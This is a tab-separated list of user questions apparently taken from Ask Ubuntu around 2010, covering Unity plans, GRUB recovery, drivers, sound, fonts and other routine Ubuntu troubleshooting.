10693	how closely will unity follow the desktop version specification ?	i read here that these will be some of the features of the desktop version of unity : a floating unity dash that can be moved to all edges of the screen . floating , overlapping windows with their title bars and controls on them , not on the top panel . the home screen consolidated into a simple pop-down menu that extends down from the top left of the screen and allows you access to your programs and desktop search . i 'm not sure how closely these points represent the plans for unity on the desktop . when it talks about a floating dash , does it mean the launcher ? as far as i know the dash is fullscreen so , how could it be moved to the edges ? also , why move it if it closes as soon as you choose an item ? if it means the launcher , do you plan to allow moving it to all edges ? is n't floating , overlapping windows with their title bars and controls on them what we always had ? also , desktop-unity is supposed to keep using the global menu so , does n't that contradict the specification ? finally , supposing `` the home screen '' means the dash , do you plan to make it not-fullscreen ?
10694	getting grub error 17 after booting	my laptop has 80 gb hard disk . i installed windows xp and left 10 gb as unpartitioned space . later i installed ubuntu 8.4 on the 10gb space . i got a 10.10 ubuntu version cd . i was installing it over the ubuntu 8.4 partition space . while installing , my laptop switched off and installation could not complete . whenever i boot , i get grub error 17. earlier , both ubuntu and windows were listed ... how to recover grub ? thanks , kan
10695	a problem with bash script	i want to write a simple script to detect a file created by windows virus . usually it creates an .exe file , with the same name , as the directory it drops . here is the script . it only works , if the path name does n't contain \n . can someone help me fix this script , please ! # ! /bin/bash if [ $ # == 0 ] ; then echo `` '' echo `` ==== give me a directory to begin with ! ==== '' echo `` '' exit fi for f in `find $ 1 -name '*.exe'` ; do filename=`basename `` $ f '' .exe` dir_name=`dirname `` $ f '' ` current_dir_name=`basename `` $ dir_name '' ` if [ $ filename == $ current_dir_name ] ; then rm -f `` $ f '' # it ca n't remove files # where the path contains spaces or \n ? ? ! ! fi done
10703	how to change monitor position/navigation ?	ive hooked up an external monitor to my netbook . on my desk the external monitor is placed to the left of my netbook . to navigate from the netbook monitor to the external monitor i have to move the mouse off to the right . i find this slightly disorienting . is there a way to configure this so that i can just move my pointer to the left , towards the external monitor ?
10712	how do i determine if i am running 32 bit or 64 bit ?	this question seems to come up quite regularly . the answer i know is to go to terminal and type uname -m if it says `` x86_64 '' then i am running 64 bit . can this be accomplished using gui ?
10716	blank screen at ubuntu login	i am running a 64 bit ubuntu , amd quadcore , with 4gb of ram and a nvidia gtx260 graphics card . the issue is as follows : once ubuntu has booted and i get to the login screen , my screen goes black and i hear the login sound . this is often spontaneous ; sometimes it loads as it should , and others it goes black . previously to login , i would restart my computer until the login screen successfully loaded , and after 4-5 attempts i would get it working . these days i use ctrl + alt + f1 to access the command line and use the following command sudo /etc/init.d/gdm restart , but again this can take sometimes up to five attempts before it successfully displays the login screen . i have previously googled this problem , and attempted many of the proposed workarounds ( editing the xorg.conf file etc . ) , and none have worked . my guess is that the proprietary graphics drivers are at fault ( as the plymouth theme is the wrong size and ugly also ) . is there proper workaround for this ? if so , please let me know , as it can try my patience immeasurably and could potentially cripple a first-time-users experience .
10718	what is in the future for revu	now that there is the post release apps process in place and there is a big push to get new software into ubuntu , what are the future plans for revu ? will there be an application review board for revu or will it remain what it is now , hit and miss at best .
10728	will unity be in the natty alpha 1 ?	i would like to try unity in desktop version . will it be available in the alpha 1 release ?
10734	can i use the apple mini displayport to dual-link dvi adapter ?	if i get an apple mini displayport to dual-link dvi adapter , will ubuntu be able to use it ?
10735	checkgmail , amsn in notification area wo n't use the gnome-panel background	when i use checkgmail , it shows up in notification area . but it never use gnome-panel 's background color . it looks like something wrong with the panel . same goes with amsn . is there a way to fix it ? or change theme to cover this up . i am now using elementary theme .
10739	will it be possible to remove/add indicator-* applets from panel without using synaptic ?	will it be possible to remove/add indicator-* applets from the panel without using synaptic ? not installing , just adding/removing installed ones . now in ubuntu 10.10 we ca n't remove one applet alone like indicator-messages without uninstalling it or removing all related/grouped indicators .
10741	how to set up dual wired and wireless connections ?	my laptop has both wireless and a wired connection capabilities . can i connect to a router a using wireless and a separate router b using wired ethernet at the same time without having to switch back and forth ? thanks for replying so quickly . i wish to connect to two separate networks . the wireless connection is to router a which is connected to broadband internet . the wired connection is to router b which i wish to share files and a printer on 1 or 2 other desktops also using wired connections on b and maybe using synergy to have only one keyboard and mouse for 2 desktops . the wireless laptop is the only one required to have internet access .
10742	setup a service that auto-magically deletes specific files from a folder	i have a folder that connects to a hardware weather logger . the data is pretty huge , and i only wish to keep the last 5 hours worth of data . this folder ; however , has also some config files such as myconfig.ini . how can i set up an automatic service that automatically deletes all files in a folder save for a few ?
10753	find out if the os is running in a virtual environment	is there any way to find out if the os i 'm running ( actually installing ) is running in a vmware machine . i need to disable ntp settings if the automated install is done on a virtual machine but keep them enabled if not . vmware tools are not installed when this check is done .
10756	why does ubuntu use python 2.6 and not 3.x ?	i have recently started learning python and thus have learned that ubuntu ( 10.10 ) uses python 2.6 . it seems to me that python 3.x is still rather unpopular in the linux/ubuntu community . why is that ? edit april 30 , 2012 python 3.2 is not shipped by default in ubuntu . there are plans to make python 3.2 default in 12.10 , however , and make it the only version shipped by then . python 2.7 will then not be on the default iso anymore . note : this is only envisaged , not certain yet . https : //wiki.ubuntu.com/python/foundationsqpythonversions
10759	mail client independent address and calendar program ?	dose ubuntu have any plans in future to integrate a mail client independent address and calendar program ?
10770	how to tell when the operating system was installed ?	uptime shows how long ago the computer was started , and that is very handy to know , but i want to know how long ago the system was installed . is there any way to do this ?
10779	how to install world of warcraft ?	i need a tutorial on how to install world of warcraft for ubuntu .
10786	will natty be distributed still on a cd ?	i read that on natty if unity is not be supported by my hardware ubuntu install a desktop like maverick . can , unity and gnome , stay together on a cd or ubuntu will be on a dvd ?
10792	importing windows live mail email accounts into evolution	i was wondering if it 's possible to get evolution mail in ubuntu to be able to import a windows live mail email account export , i have multiple email accounts and lots of email messages attached to each account and and being able to import them all into evolution would be nice . is there a way to do this ? the exports from windows live mail are in a .iaf format which seems microsoft specific .
10797	how to disable `` available '' on the application display ?	when i use the search application box , i keep getting suggestions for applications , which boggle the speed of the search down to a halt ( the whole thing is very slow as it is , on a eeepc netbook ) , is there a way to make unity stop offering suggestions ? i ca n't find anywhere to actually configure that thing
10800	how to restore software sources in system- > administration menu ?	until ubuntu 10.04 in system- > administration menu there was the `` software sources '' utility available . now with ubuntu 10.10 it 's only accessible from synaptic package manager . is it possible to restore this functionality in ubuntu 10.10 menu ?
10801	why hamachi time-outs after 5 minutes or so ?	i installed hamachi and hamachi-gui , on both my girlfriend 's pc and netbook . after 5 minutes or so ( even if i keep using it during that time ) it loses its online-connection . i have to go offline , then online again in order to see my ip again . if i do n't and i ping my ip , it says host unreachable . now when i connect with my mac from the office the problem does n't exist , so i would n't say it is a problem of my `` hamachi ( server ) installation '' , and i am tempted to say , it is a problem of my girlfriend 's connection , since it happens from her home , and we have n't tried yet to connect from another home with her setup . i followed these instructions . what would you say ? !
10804	disallow user from moving/renaming a directory ?	how can i disallow a user from moving/renaming a subdirectory of this home directory ? even if a user does n't have any rights on a directory , it can rename/move it as long as the source and destination parent directory are writable . i had a similar problem on macosx . users inadvertently drag & drop the `` library '' folder somewhere else breaking everything as there are applications depending on that path . i do n't it would be better to depend on another path , outside the home dir , or use `` .files '' but i have a legacy situation . i tried to fix the problem my putting the dir somewhere else and then making a `` bind '' mount mount -o bind sourcepath /home/user/somedir it prevents the renaming of the dir : mv : can not move `somedir ' to `somethingelse ' : device or resource busy does anybody know an easier way ?
10808	auto complete for startable/stopable services ?	before upstart it was easy to get proper autocomplete , e.g . i type sudo /etc/init.d/rsys < tab > and what i want to do and there i go . now i need ( ? ) to write sudo stop rsys < tab > but it does n't work ; seems the bash does n't know what services can be started/stopped at this point . is there an ubuntu package or manual activation for that ?
10811	what computer architectures are available ?	where can i find a list of which architectures are available for ubuntu , and which of those have official support from canonical ?
10813	is it safe/possible to hold user accounts on an ntfs partition ?	i know i can link folders in /home/fancyusername to a folder on an ntfs partition , but would it be safe to store an entire /home/blabla in this same manner ? would the system choke up on permissions ? i 'm asking because our system got damaged in a hurricane ( fried ) and the only bootable drive ( so far ) is a 3gb drive ! i 've got maverick on it , but need to get space for other users , espc my father , so we can get our church information flowing etc . this very critical so i ca n't take major risks . any information would be useful .
10817	import .key presentations from keynote	is there a way to import .key files from keynote into openoffice in ubuntu ? i know you can open them as zip files , but ca n't i open them as pdf or something similar ?
10820	if unity gets a plugin framework/api of some sort , what languages will be available ?	with unity being ported to compiz ( i read somewhere as a plugin ? ) , will unity be getting a plugin/extension framework of some sort ? if yes , what languages are on the table ? python , vala , c++ ? or will it be something more like gobject-introspection ? along with this , are widgets/gadgets/miniapps/w.e planned ? please let me know if to split the question .
10825	how can i sync files when i plug in my usb	i was thinking it would be extremely useful if i could sync the files between a folder on my usb and a folder on my desktop . if someone can give me a simple set of instructions on this topic i would be thrilled !
10827	how does one enable compiz on alienware m11x r2 ?	i want to enable compiz on my alienware m11x r2 but when i try to i get a message that i have to enable nvidia propietary drivers and i ca n't enable them because it will cause problems with next startup because the nvidia is the discrete gpu of my laptop , i had done a search this here and here . but i seem to not get it working right . i have also tried the vga-swticheroo thing with no results at all .
10829	all applications to indicator-applet ?	are all programs goining to indicator-applet in unity ubuntu 11.04 and the notification area is going to be removed completly ? like deluge , network manager and so ? now you ca n't remove notification area applet , because some programs use it .
10832	what login screen program will 11.04 use ?	will ubuntu continue using that old ( gnome 2.x ) login screen , or create its own , or there will be a new one in gnome 3 ?
10833	how much room do language packs take ?	in order to save space , is it possible to make the cd english-only , and put the other languages only on the dvd ?
10836	is there a way to keep ufw logging out of dmesg ?	there are comments in the /etc/rsyslog.d/20-ufw.conf file that give you the option to keep ufw-events from being logged to the kernel and message logs , which i have done . i would really like to get ufw-events out of the dmesg as well , but how to accomplish that ?
10839	how can i find the total size of the contents of my trash folder ?	is there any way i can find out exactly how much is in my trash folder ? i can see the size column , but if i have a folder in the trash , it shows the number of items in the folder rather than the total size of the items in the folder .
10844	what is on the dvd edition of ubuntu ?	just curious , because google is n't coming up with anything and ubuntu.com is hardly descriptive ; but what is the difference between ubuntu cd .iso and the dvd .iso ? what 's on the dvd that is n't on the cd ?
10852	installation of custom ubuntu livecd	i 'm following the guides at https : //help.ubuntu.com/community/livecdcustomization and https : //help.ubuntu.com/community/installation/fromimageloadedonharddrive in order to make a custom ubuntu cd to send to a family member . it appears to me that if i make a custom image that when i chose the install option from the boot menu it will actually install that custom image with all of the packages that i chose and not the default ubuntu installation . but i wanted to make sure that is the case because if i can not create an installable custom cd then its useless for what i want to do . can anybody clarify this for me ? thank you .
10853	how do i switch to another language ?	how do you switch ubuntu to another ( human ) language without reinstalling it ?
10861	does the wacom bamboo pen & touch work out of the box ?	is there any tweaking involved in ubuntu 10.10 to make the wacom bamboo pen & touch work ? and is this hardware getting some love from the new multitouch framework ? if there 's no multitouch support for it , then i 'd fall back on the simpler ( and cheaper ) wacom bamboo pen ( to draw , no multitouch ) ... enac 's general list of linux multitouch devices states the following regarding wacom : `` the 'wacom ' kernel driver handles these , and is undergoing work to make it compliant with the kernel multitouch protocol . '' but is this also compatible with ubuntu 's multitouch protocol ( which i understand is a different effort than the kernel 's )
10862	are there plans for a progress indicator ?	status menus seem to be intended , among other things , to streamline indications . some of these indications are not confined to the old notification area : others can be found on their own windows and indicate running processes , such as nautilus copying some files , firefox performing downloads or brasero burning a dvd . i have seen a series of mockups showcasing mockups for a progress indicator : i would like to know if there are any actual plans to create a real progress indicator to house this type of indications .
10864	sound problem with toshiba satellite l35-sp1011	i 've installed ubuntu 10.04 on a satellite l35-sp1011 and there 's no sound . actually i have many video problems cause i had to disable effect because when it had effect activated , laptop got frozen many times . i saw this problem but in older ubuntu versions and tried some fixes without success . any idea on how to solve my audio and video problems ? i 've tried these instructions https : //help.ubuntu.com/community/radeondriver without success . my video card is a ati express 200m . lspci output 00:14.2 audio device : ati technologies inc ixp sb4x0 high definition audio controller ( rev 01 ) 00:14.3 isa bridge : ati technologies inc ixp sb400 pci-isa bridge ( rev 80 ) 00:14.4 pci bridge : ati technologies inc ixp sb400 pci-pci bridge ( rev 80 ) 01:05.0 vga compatible controller : ati technologies inc rc410 [ radeon xpress 200m ] complete lspci output at http : //pastebin.com/avk1wwqt i have solved this by editing /etc/modprobe/alsa-base.conf in ubuntu 10.10 and added options snd-hda-intel model=asus now i 'm working on video , i added xorg-edgers ppa , updated and upgraded without big difference ... it 's working better but without transparency .
10865	is it safe to use gdebi instead of ubuntu software center to install .deb files ?	i 've noticed that ubuntu 10.10 manages single .deb files with the ubuntu software center . since i find it too heavy to load i 've installed gdebi with : sudo apt-get install gdebi and i 've set it as default application to open any .deb file . my question is : is it safe/supported to use this kind of operation ? i mean : does gdebi still relate to internal apt-get to satisfy dependencies and install .deb files ?
10866	recordmydesktop stopped working after upgrade	i 've done the upgrade to ubuntu 10.10 from ubuntu 10.04 , and recordmydesktop do n't work now . if i start it from command line it seam to work , but the interface do n't start and i have this error : initial recording window is set to : x:0 y:0 width:1680 height:945 adjusted recording window is set to : x:0 y:0 width:1680 height:944 your window manager appears to be metacity initializing ... buffer size adjusted to 4096 from 4096 frames . opened pcm device default recording on device default is set to : 1 channels at 22050hz x error : badaccess ( attempt to access private resource denied ) bad access on xgrabkey . shortcut already assigned . x error : badaccess ( attempt to access private resource denied ) bad access on xgrabkey . shortcut already assigned . x error : badaccess ( attempt to access private resource denied ) bad access on xgrabkey . shortcut already assigned . x error : badaccess ( attempt to access private resource denied ) bad access on xgrabkey . shortcut already assigned . capturing ! x error : badaccess ( attempt to access private resource denied ) bad access on xgrabkey . shortcut already assigned . x error : badaccess ( attempt to access private resource denied ) bad access on xgrabkey . shortcut already assigned . x error : badaccess ( attempt to access private resource denied ) bad access on xgrabkey . shortcut already assigned . x error : badaccess ( attempt to access private resource denied ) bad access on xgrabkey . shortcut already assigned .
10869	will the unity launcher be removable ?	i happen to like docky ; i also like awn and other such docks . so my question is , with ubuntu 11.04 , and unity ; can i still keep 'unity ' but operate without the dock ? ( or indeed , other elements ? )
10873	is there a gedit plugin that adds search features ?	i 'm hoping to add search and replace within selection and search within files . having a search option in the context menu would also be handy .
10874	automatically close the archive manager after extracting a file	when i successfully extract an archive i 'm greeted with a success dialog with the option to quit , show the files or close . is there any setting that will automatically execute one of those options ?
10880	disable ctrl+q in firefox without keyconfig extension	how do i disable the ctrl + q shortcut in firefox without using the keyconfig extension ?
10881	how do i remote control a dvd player without a remote ?	we have a proto-media centre , which is just a box in the corner , running ubuntu , and connected to a projector . what is the best way to control a dvd player running on that box , without a remote control ? we would like instead to control it from a laptop/phone over the network . i 'm open to suggestions for software to use , and the more flexible the interface , the better .
10893	how can i drag windows over the panel ?	basically , i want my windows to go wherever on the screen . i do n't want to panel to be a block . how can i disable not being able to drag windows on top of not under the panel ? oh , and , yes : gnome-panel .
10896	nautilus sorts the name-column `` mysteriously '' . how can i change the collating sequence ?	what i describe here is not about a problem with my nautilus . ( it is the default behavour ) i understand why nautilus sorts the name-column ( ascending ) so that `` 6 cats '' occuring before `` 10 dogs '' ... its collation sequence is treating a group of numeric-digits as a single number-value and not as individual characters . that 's fine ... i can see some value in it , but personally i find it to be confusing , and i have no idea why nautilus completely ignores many leading non-alpha-numeric characters.. ie. ! @ $ % ^_ : '' - etc . as typed via as standard us keyboard.. by `` ignore '' , i mean `` -- -two camels '' sorts to be immediately above `` two camels '' , as if the `` -- - '' did n't exist ... ( strange ! ? ) . how can i change the default collating sequence ? ... gconf-editor /apps/nautilus/list_view shows some sort options , but does not offer a choice of collation option ... . i hope there is an way to do this ( otherwise windows explorer is one-up on this issue : ( windows allows you to choose the conventional collation sequence ( via the registry )
10897	why does adjusting my volume exit fullscreen videos ?	when playing flash videos ( youtube , vimeo , whatever ) in full screen mode , using my keyboard shortcuts to adjust the volume always causes me to exit full screen mode . unfortunately , they 're my only way to adjust the volume , so it 's really annoying .
10901	how do i create a new wallpaper slideshow ?	there 's a set of psychadelic pictures i 'd really like to have on loop for my wallpaper to get lost in right now , but ca n't seem to figure out how to combine them into one stack .
10905	why does chrome video performance substantially degrade after waking from suspend in 10.10 ?	note : for some more details , some of which may not be true given what i 've figured out , see this post . when i first boot my computer , video performance ( both native h.264 html5 in youtube and vimeo , and in flash ) in chrome is perfectly reasonable . cpu usage stays slow , everything works correctly , and the video is silky-smooth . but for whatever reason , if i suspend my computer then wake it up , video performance plummets . full screen html5 video is choppy at best , and full-screen flash video basically brings my computer to its knees ( i 'm talking less than a frame a second , and a 5 second lead time to leave full-screen after hitting esc ) . restarting chrome does n't fix this — i need to completely restart my machine before performance goes back to normal . video performance in other applications , such as movie player , does n't seem to be affected at all by the suspend cycle — it 's only chrome . i 'm using a lenovo x201 , with an intel gma hd graphics chipset , and intel compnents all around ( i do n't need any proprietary drivers ) . this did n't happen in 10.04 , and i have n't anything that i think would have caused this to happen . it 's possible that a chrome release could have caused this , but it seems less likely than a regression between 10.04 and 10.10 . any ideas ? edit : in response georg 's comment , logging in and out does n't fix it . restarting compiz or switching to metacity ( at least by using `` compiz/metacity -- replace & disown '' — am i doing it right ? ) does n't help ( actually , it seemed to help somewhat with flash once , but i have n't been able to reproduce this ) . i 'm not sure about gdm — when i use `` sudo restart gdm '' i get kicked back to the linux shell ( ? ) , which i have no idea how to get out of . also , i want to make very clear that this is n't just a case of flash sucking ( it does , but that 's beside the point ) . i '' m seeing the same general problem with html5 videos , and flash is performing better on my nexus one than it does on my core i5 laptop . there 's something screwy going on with chrome and/or 10.10 .
10908	how to sync time ?	how to sync time in ubuntu 10.10 ( a gui solution if possible ) ? how to sync time in ubuntu 10.04 server ( a console solution if possible ) ?
10911	why was banshee chosen to be the default for 11.04 ?	what are the reasons for banshee replacing rhythmbox in ubuntu 11.04 ? i do n't want your opinion on which is best nor why . i want to know what the reasoning was behind the decision .
10912	how do i restore sources that are ignored on upgrade ?	when i upgraded my server to 10.10 , some of my sources ( basically hudson and git ) are now being ignored ... any idea how i can get them active again ? the entries are in the /etc/apt/sources.list file , but the status line on apt-get update says ign http : //hudson-ci.org binary/ packages
10914	usb full install damage flash drive ?	when comparing a full install of a usb flash drive versus simply creating a live usb , is there a significant amount of wear on the usb flash drive when using a full install ? when reading around i was informed that having a full install would cause the system to use your usb drive too heavily and wear it out in terms of how many times it can be written and read from . is this true ?
10919	synaptic remove `` gedit '' wants to remove `` ubuntu-desktop '' . how can i reinstall `` gedit '' ?	i want to make a clean start with gedit ; ie . remove all customization . synaptic package manager , indicated that ubuntu-desktop would also be removed ! well , that sounded to be a bit on the dramatic side , so i tested it in a vm.. it was dramatic ! ... i lost my ubuntu deskop ! ( ... funny about that ! ) okay , my potential disaster was averted thanks to vms , but i still want to fully uninstall and reinstall a fresh instance of gedit . how can i do this ?
10929	manually download packages on other operating systems	to connect to the wireless at my sister 's university , i need the ca-certificate package . but since there is no internet connection , i ca n't download it from the repos . how can i manually download it at a windows system and install it ? a .deb pacakge would be most helpful .
10937	why is desktop unity using the global application menu ?	it was announced in another question that the desktop version of unity will keep the global menu by default . here are the facts : the global menu was introduced into une to save vertical screen space because at netbook resolutions the vertical space is limited . on a modern desktop with a high resolution , there is ample vertical space making this unnecessary on the announcement of une global menus , mark shuttleworth himself said the following : '' there are outstanding questions about the usability of a panel-hosted menu on much larger screens , where the window and the menu could be very far apart . '' the benefits of a global menu do n't seem to carry across to a high-resolution desktop and instead seem to bring draw backs ( increased mouse travel , large distance between the menu and its associated window ) . the other worrying factor is that applications seem to be moving away from having a menu bar , and instead of innovating on this and defining new guidelines for moving away from the menu , we are giving it prime place right at the top of the desktop . if applications continue moving away from the desktop we will have an inconsistent experience concerning where to locate application related options/tools depending on which app you are using ( e.g . chrome ) . finally , the current global menu bar implementation does n't work for all apps , and does n't even work for all apps in the default install . this means that the default desktop implementation will be inconsistent . so , there are a bunch of reasons why moving to a global menu is a bad idea , so we need some pretty convincing arguments for why it is a good idea . what are the reasons for the global menu implementation in the desktop version of unity ?
10940	can i switch between gnome desktop and unity ?	i remember in ubuntu jaunty i tried to use ubuntu net-book remix . it worked and it looked so great , but i had no way to return to gnome desktop . then i decided to remove ubuntu net-book remix but the title-bar disappear on maximized windows . will it happen on unity ?
10947	how to auto mount my external hard drive ?	on login , ubuntu 10.10 would not mount external hard drives automatically , while ubuntu 10.04 mount them on login . i 've tried storage device manager but it give error when external hard is not plugged . any idea or suggestion ?
10948	how do i stop unity from starting windows maximised ?	how do i stop unity from starting windows maximised ? i like lots of windows spread across my desktop . it is fine on a netbook , but not on a large desktop .
10954	font rendering ( antialiasing ) settings	the default x11 font rendering settings have changed considerably since hardy : karmic and lucid render fonts very differently -- it seems that more subpixel hinting and antialiasing gets applied . is it possible to get the old settings back ? ( the new default hurts my eyes , and have a strong negative impact on my productivity . ) in system / preferences / appearance / fonts , i have all fonts set to arial . i have arial installed on both my hardy and lucid machines . smoothing is set to grayscale , hinting is set to full , subpixel order is set to rgb . a visual illustration of < span style= '' font-family : arial ; font-size:13px '' > peter , < b > peter < /b > , < /span > : : hardy_gray_good : lucid_gray_bad : lucid_subpixel_bad hardy renders the html fragment above as hardy_gray_good above , and i 'd like to get the same on lucid -- but lucid can only render it as lucid_gray_bad or lucid_subpixel_bad ( depending on my font rendering settings in system / preferences / appearance / fonts / details / smoothing . how do i get hardy_gray_good on lucid ? see http : //dl.dropbox.com/u/635918/fontrender/fontrender.html for all the sample images and their zoomed counterparts . i 'm not asking which font i should use . in this question i 'm interested in fixing the rendering for all fonts , with the existing renderings ( lucid_gray_bad and lucid_subpixel_bad ) and the desired rendering ( hardy_gray_good ) illustrated for arial at 13px . i 'm not asking which of the 3 variants above are more readable -- for me , hardy_gray_good is much more readable than the 2 others , and i 'd like to have it on my ubuntu lucid system .
10958	how do i know if a laptop will work with ubuntu ?	i want to buy a laptop at some point in the near future , but not knowing beforehand whether it works with ubuntu makes the whole operation risky and tiresome . i would like to know if there is some kind of official hardware database where i can enter the name of the laptop i 'm interested in and see if it 's 100 % compatible out of the box , or in case it is n't what is it exactly that does n't work ( ideally also if there is a way to fix it ) . does canonical have a project along these lines ?
10966	how can i tell whether my firefox is 32 bit or 64 bit ?	i have a 64-bit ubuntu . for the preinstalled firefox i had to download the 64-bit plugins ( flash , java ) ; the 32 bit plugins did n't work . then i downloaded firefox from mozilla.org , which just has one version to download , and it does not state whether it is 32 bit or 64 bit ( as of november 2010 ) . using this downloaded firefox all the 64-bit plugins no longer work . i had to download the 32 bit plugins . how can i tell whether my firefox is 32 bit or 64 bit ?
10970	very low sound , even when i raise the volume on a realtek alc882	i get very low sound in ubuntu 10.10 , even when i raise the volume sound card info : card : hda intel chip : realtek alc882
10974	is there a way to find out the current volume level ?	like the question states . is it possible to change any system settings such that when i hover over the volume control applet or slider , the current level is shown in a tooltip ( the number ) ? or is there at all some place from where i can view this . even the sound preferences dialog does not show the actual number , which is strange to say the least .
10980	what 's the simplest way to account traffic ?	i use a 3g cellular internet connection with a very strict traffic limit , but some times i go to office and use an unlimited and fast cable connection ( and of course i do traffic-consuming operations , like updating the system there ) . i 'd like to keep track of how much have i already downloaded using the mobile connection ( so , it can either filter by interface or be easily suspendable so that i can pause it when i use an unlimited line ) this month ( so , the counter most not reset when i reboot my laptop or reconnect , i 'd lile to only reset it manually ) . what 's the easiest way to do this in ubuntu 10.10 ? i would n't like to set up any complex monitoring/billing systems .
10984	ubuntu as dvr , if the tv is off on boot , nothing will display when i turn the tv on . suggestions ?	i 'm running 10.04 and mythtv as a home dvr . it 's working beautifully , except for one thing . in order to save on energy usage i have the computer shut down if it 's going to be idle for more than 15 minutes , and automatically boot back up 10 minutes before the next scheduled activity . the problem is that , if the computer boots with the tv off , it does n't detect the display . when i turn the tv on it will display absolutely nothing . i must then reboot the computer with the tv on to get it to detect the display correctly so i can watch tv . of course , i ca n't reboot the computer if it 's in the middle of recording a show - which makes the whole thing a bit frustrating . how can i set the display settings so they are permanent , rather than detected on boot ? or , how can i have the display re-detected and then restart x via command line so that i do n't have to reboot ? or , are there any other suggested solutions ?
10986	changing first day of week using gui in unity	is there coming possibilty to change the first day of week to be a monday in gnome calender applet using unity gui ? it 's hard to change it now to standard user . ( according to international standard iso 8601 sunday is the seventh and last day of the week . = why we do n't use standards as default ? / http : //en.wikipedia.org/wiki/sunday )
10997	will there be a 'home ' icon on the launcher of desktop-unity ?	in order for me to access my 'home ' currently in unity , i have to click on 'deleted items ' and then the 'home ' button which is situated in the toolbar on the nautilus window . it would be quite convenient having a 'home ' icon on unity 's launcher for quick access to the users common folders .
10998	what developer text editors are available for ubuntu ?	i 'm looking for a text editor for programming in python , preferably one which is easy to learn for beginners .
11002	alt + sysrq + reisub does n't reboot my laptop	on occasion , my laptop has become stuck so i 've used the magic key combination of alt + sysrq + reisub to perform a safe reboot . however , it does n't seem to work for me as when i press the b key to complete the magic key command it simply says , `` resetting ... '' and does n't do anything . all of the other keys seem to work fine as it resets the keyboard layout , kills all tasks etc. , but it does n't seem to complete with a reboot . i was under the impression that my laptop should reboot after the magic keys have all been pressed in the order of reisub .
11009	using same hdd on multiple laptops as boot drive	i have a hdd with ubuntu ( lucid lynx ) that i use on my samsung laptop . can i use the same hdd as main ( boot drive ) on another laptop ( hp ) ? will it automatically install drivers ? do they override ? is it possible , that it will break my existing setup with overriding my drivers so i ca n't use it later on my samsung ?
11015	need wired/wireless atheros driver for ar9285 and ar8152	how can i install atheros drivers to my toshiba laptop ( 64bit ) , manually ? i need ar9285 wireless adapter , and ar8152 ( v1.1 ) wired , fast ethernet . i can not connect my uberstudent1.0 ( linux os , ubuntu10.04 , equiv . ) to the net . i have on the laptop mint8 which connects well and able to download any drivers . please , would you kindly show me how to install them if they are not .deb formats . tarballs , zip , etc , still give me a hard time to work with .
11017	how do i automatically obscure my face when using video chat ?	i want to use empathy , skype , etc for video chat , but i want to have my face automatically detected and obscured in the video stream . what can i do to make that happen ? i do n't want to turn off video or just use a static image .
11020	print terminal output in gedit automatically ?	the command time ./myprog displays the time it took to run myprog on the screen . now i would like to write this information to a text file . how ?
11027	sharing files with a dd-wrt router	i plan to buy a new wifi router with the intention of installing dd-wrt right away . one of the features i plan to use is attaching a usb harddrive to the router and using it to backup ( using rsync ) my laptop and desktop . as far as i can google , dd-wrt shares files through samba . i know it 's not the prefered option for ubuntu users and we would prefer nfs , but does anyone know how bad or good it is this setup ? does anyone here use dd-wrt as a file server succesfully ?
11031	add a string to a text file from terminal	i would like to modify a bunch of text files from the terminal , more precisey : add the string '50 ' to the first line of every text file in /mydat/ ? alternatively , if you know of a link to a page on the web that lists commands to manipulate text files from the shell ...
11040	disable `` google mail all mail '' folders in evolution	my gmail account is properly set up and shows a list of folders , inbox , drafts , etc . but it has an additional folder all [ google mail ] and in it i can see all mail , spam , etc . i want to disable it and disable the subscription to it so that it does n't appear in the interface at all .
11041	reducing audio delay from redirecting input to output	i tried using the solution presented in a related question for redirecting my audio input to my output , but the problem is that there 's a very noticeable lag . it 's especially obvious to me because i have my keyboard 's audio out hooked up to my soundcard 's in , which is then redirected to a different audio out device on my computer . i 'd say there 's at least 1/8th sec lag introduced . gst-launch pulsesrc ! pulsesink nice -n -15 gst-launch pulsesrc ! pulsesink does not help any . any alternative ways that might work better ?
11042	how do i get my clipboard `` copy /paste '' working again ?	i 'm running ubuntu 9.04 , and out of the blue i can no longer use copy/paste key-shortcuts . i imagine , if i restart my computer i will be able to , but that is rather a pain than an option ! type `` hello '' into text editor highlight the text `` hello '' press ctrl+c see the text become unhighlighted ( is this normal ? ) press ctrl+v see the word `` network '' get pasted in.. perhaps that was the last thing i copied when it was still working ? how can i fix/reset the clipboard ?
11043	is there a way to replace kdm with gdm ?	well i tried kubuntu not long ago , didnt liked it and purged it from my system , except one thing , i still have the kde login screen , is there anyway to get my gnome login screen back ?
11049	stop program from terminal if running for more than x seconds	so by typing /.blabla i launch the program blabla . is there a way , from the terminal , to stop ( i.e . equivalent of ctrl+c ) blabla has been running for more than x secs ? ( i 'm trying to test a program of which i have not the source on various random inputs , and the thing gets stuck occasionally ) .
11067	how to clone a hard drive to an image that i can open later ?	i need to make a ( preferably ) mountable image of an 80gb hdd , and store it on another hard drive . is there some way that i can do this without losing data ? thanks for the answers i 've received so far . the system in question can not be used right now due to a problem with the power button : ( [ ugh ! ] , but the information will really be useful = ) ! thanks to all who answered so far , if anyone else wants to give me some tips i 'll leave this open for a bit , as i still have not yet been able to clone the drive .
11075	how can i enable the `` share desktop '' feature in empathy ?	what steps do i need to follow if i want to use the share desktop feature with another user in empathy ? i 've already enabled the remote desktop option through system - > preferences - > remote desktop and checked the service for this task is up , so i ca n't get what else i 'd need . by the way , i 've tried using this feature with contacts using empathy too .
11079	mount a directory to look like a drive	is it possible to mount a directory , either an ext # local one , or one in a /media mounted windows drive , so it is seen as a mounted drive itself ?
11088	how can i physically identify a single drive in a raid array ?	i have an external drive bay with 4 esata disks in it . my system has a 4-port esata card , as well as a pair of internal hardware raid1 drives . the external drives are in software raid1 pairs as /dev/md0 and /dev/md1 . both have been configured as lvm physical volumes to create my storagevg lvm volume group . recently , a single drive went offline ( i suspect cables ) , but there does not seem to be a good way to physically identify which drive i need to check , especially since initialization order is n't the same between boots . how can i find the disk needing attention ?
11096	how do i tell what type of touchpad is in my notebook	i 'm trying to determine why horizontal scrolling is n't working for me on ubuntu 10.10 , but i 'm not sure how to tell what type of touchpad is in my lenovo thinkpad t400 . i tried running lspci and lsusb but neither one showed anything along the lines of touchpad , mouse , or anything that felt like it was my touch pad . how do i tell ?
11098	installer unable to continue ?	i am trying to install ubuntu 10.10 on to my laptop ( toshiba 64bit , with windows 7 and mint 8 already in it ) . however , for several times now when i try to install the new os , it can not go further than the second screen where it has all boxes ticked ( as ok ) . the activity indicator just goes on like forever ! any idea/help as to why ?
11101	what protocols support screen sharing on empathy ?	i am trying to follow the directions here but so far have not found a working protocol so i was wondering if anyone knew of a working protocol that works ?
